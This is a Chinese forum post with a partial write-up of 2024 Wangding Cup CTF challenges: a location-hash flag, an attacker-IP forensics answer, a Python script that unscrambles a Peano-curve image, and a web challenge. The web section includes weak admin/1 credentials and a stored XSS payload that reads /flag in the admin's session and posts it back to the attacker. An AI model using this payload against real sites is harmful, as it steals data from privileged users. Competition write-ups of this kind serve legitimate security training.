2024网鼎杯青龙组Web+Misc部分WP

王柳  金牌会员 | 2024-11-6 13:56:58 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题

主题 889|帖子 889|积分 2667

MISC01

发现人员的定位信息存在泄漏,请对其进行分析。flag为用户位置信息进行32位md5哈希值
我们在这里可以找到关于Location——information信息

实验把val值继续32位md5哈希加密,拿到flag
flag{4c4e66ea9aa659b1cac5d4fe327bbfc1}
MISC03

第 1 步:看到好几个上传木马的 ip,都试一试,最终 ip 为 39.168.5.60 的为
精确攻击 ip

MISC04

推测应该是按着曲线的轨迹将像素还原到原来的位置

脚本如下:
  1. from PIL import Image
  2. from tqdm import tqdm
  3. def peano(n):
  4.     if n == 0:
  5.         return [[0,0]]
  6.     else:
  7.         in_lst = peano(n - 1)
  8.         lst = in_lst.copy()
  9.         px,py = lst[-1]
  10.         lst.extend([px - i[0], py + 1 + i[1]] for i in in_lst)
  11.         px,py = lst[-1]
  12.         lst.extend([px + i[0], py + 1 + i[1]] for i in in_lst)
  13.         px,py = lst[-1]
  14.         lst.extend([px + 1 + i[0], py - i[1]] for i in in_lst)
  15.         px,py = lst[-1]
  16.         lst.extend([px - i[0], py - 1 - i[1]] for i in in_lst)
  17.         px,py = lst[-1]
  18.         lst.extend([px + i[0], py - 1 - i[1]] for i in in_lst)
  19.         px,py = lst[-1]
  20.         lst.extend([px + 1 + i[0], py + i[1]] for i in in_lst)
  21.         px,py = lst[-1]
  22.         lst.extend([px - i[0], py + 1 + i[1]] for i in in_lst)
  23.         px,py = lst[-1]
  24.         lst.extend([px + i[0], py + 1 + i[1]] for i in in_lst)
  25.         return lst
  26. order = peano(6)
  27. img = Image.open(r"C:\Users\ASUSROG\Desktop\chal.png")
  28. width, height = img.size
  29. block_width = width # // 3
  30. block_height = height # // 3
  31. new_image = Image.new("RGB", (width, height))
  32. for i, (x, y) in tqdm(enumerate(order)):
  33.     # 根据列表顺序获取新的坐标
  34.     new_x, new_y = i % width, i // width
  35.     # 获取原图像素
  36.     pixel = img.getpixel((x, height - 1 - y))
  37.     # 在新图像中放置像素
  38.     new_image.putpixel((new_x, new_y), pixel)
  39. new_image.save("rearranged_image.jpg")
复制代码
拿到二维码,扫描拿到flag

参考:IrisCTF2024 | 1r0ny
WEB02(环境关了没图片呜呜呜)

第 1 步:打开网页,目录扫描扫描到/flag,实验访问,提示只有 boos 可以访
问。
第 2 步:实验登录,admin/1,登录成功。
第 3 步:
  1. <script>fetch('/flag').then(response=>response.text()).then(data=>{fetch('/content/a9571d0
  2. e889a28847d8682903',{method:'POST',headers:{'Content-Type':'application/x-www-form-
  3. urlencoded'},body:"content="+data});})</script>
复制代码
更新之后提交给 boos,革新页面拿到 flag

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

王柳

金牌会员
这个人很懒什么都没写!
快速回复 返回顶部 返回列表